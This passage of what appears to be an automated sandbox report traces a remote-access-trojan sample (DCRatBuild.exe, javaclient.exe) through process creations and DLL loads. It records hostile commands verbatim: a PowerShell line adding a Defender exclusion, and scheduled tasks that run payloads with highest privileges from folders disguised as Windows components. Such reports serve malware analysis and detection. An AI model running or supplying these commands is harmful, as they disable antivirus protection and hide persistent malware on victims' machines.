              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Componenthost\aZjsojBpBtPKe.vbe"
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Componenthost\N1me8mpFe7zJQMouCBhkn06ZkahUl.bat" "
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Componenthost\providerreviewdhcp.exe "C:\Componenthost\providerreviewdhcp.exe"
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtLh" /sc MINUTE /mo 11 /tr "'C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe'" /rl HIGHEST /f
              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows defender\en-GB\Memory Compression.exe'" /f
              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Memory Compression" /sc ONLOGON /tr "'C:\Program Files (x86)\windows defender\en-GB\Memory Compression.exe'" /rl HIGHEST /f
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe'
              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows defender\en-GB\Memory Compression.exe'" /rl HIGHEST /f
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Mail\WmiPrvSE.exe'" /f
              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\WmiPrvSE.exe'" /rl HIGHEST /f
              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Mail\WmiPrvSE.exe'" /rl HIGHEST /f
              Source: unknownProcess created: C:\Users\user\cmd.exe C:\Users\user\cmd.exe
              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtLh" /sc MINUTE /mo 8 /tr "'C:\Users\Default\PrintHood\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe'" /f
              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtL" /sc ONLOGON /tr "'C:\Users\Default\PrintHood\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe'" /rl HIGHEST /f
              Source: unknownProcess created: C:\Users\user\cmd.exe C:\Users\user\cmd.exe
              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtLh" /sc MINUTE /mo 8 /tr "'C:\Users\Default\PrintHood\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe'" /rl HIGHEST /f
              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe'" /f
              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe'" /rl HIGHEST /f
              Source: unknownProcess created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe C:\Users\Default\PrintHood\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe
              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe'" /rl HIGHEST /f
              Source: unknownProcess created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe C:\Users\Default\PrintHood\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe
              Source: unknownProcess created: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe "C:\Program Files (x86)\windows defender\en-GB\Memory Compression.exe"
              Source: unknownProcess created: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe "C:\Program Files (x86)\windows defender\en-GB\Memory Compression.exe"
              Source: C:\Componenthost\providerreviewdhcp.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8o9UezPTg6.bat"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\cougif6lqM.exeProcess created: C:\Users\user\AppData\Local\Temp\javaclient.exe "C:\Users\user\AppData\Local\Temp\javaclient.exe" Jump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeProcess created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe'Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtLh" /sc MINUTE /mo 11 /tr "'C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe'" /rl HIGHEST /fJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Componenthost\aZjsojBpBtPKe.vbe" Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Componenthost\N1me8mpFe7zJQMouCBhkn06ZkahUl.bat" "Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Componenthost\providerreviewdhcp.exe "C:\Componenthost\providerreviewdhcp.exe" Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8o9UezPTg6.bat" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
              Source: C:\Users\user\Desktop\cougif6lqM.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: dxgidebug.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeSection loaded: version.dllJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeSection loaded: dlnashext.dllJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeSection loaded: wpdshext.dllJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeSection loaded: slc.dllJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
